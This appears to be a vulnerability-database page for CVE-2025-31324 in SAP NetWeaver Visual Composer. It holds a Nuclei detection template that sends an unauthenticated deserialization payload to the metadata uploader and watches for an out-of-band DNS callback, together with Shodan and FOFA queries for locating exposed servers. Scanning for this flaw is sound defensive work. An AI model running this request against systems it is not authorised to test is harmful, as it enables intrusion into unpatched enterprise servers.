SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
CVE-2025-31324
Verified
Description
SAP NetWeaver Visual Composer Metadata Uploader is not protected with proper authorization, allowing an unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
Severity
Critical
CVSS Score
10
Exploit Probability
80%
Affected Product
netweaver
Published Date
April 26, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
CVE-2025-31324.yaml
id: CVE-2025-31324

info:
  name: SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
  reference:
    - https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
    - https://www.theregister.com/2025/04/25/sap_netweaver_patch/
    - https://me.sap.com/notes/3594142
    - https://url.sap/sapsecuritypatchday
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-31324
    cwe-id: CWE-434
    epss-score: 0.79541
    epss-percentile: 0.9902
    cpe: cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sap
    product: netweaver
    shodan-query:
      - http.html:"sap netweaver application server java"
      - cpe:"cpe:2.3:a:sap:netweaver"
      - http.favicon.hash:"-266008933"
    fofa-query: icon_hash=-266008933
  tags: cve,cve2025,sap,netweaver,rce,deserialization,kev

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',54,'prefix')}}"

http:
  - raw:
      - |
        POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data

        {{zip('.properties',replace(base64_decode('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'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',payload))}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'FAILED', 'Cause')
        condition: and
# digest: 4a0a00473045022100bb9f6187bac7018fe7efac0fe3ad28d02d78c3bc081fdf3b4d0015884c19751d02207c098d8aba46520a4d6726de2e2fe8ecf4e32cbe356e2cae207c9c9d61390b85:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
CVE-2025-31324
CWE ID:
CWE-434
References
https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
https://www.theregister.com/2025/04/25/sap_netweaver_patch/
https://me.sap.com/notes/3594142
https://url.sap/sapsecuritypatchday
https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/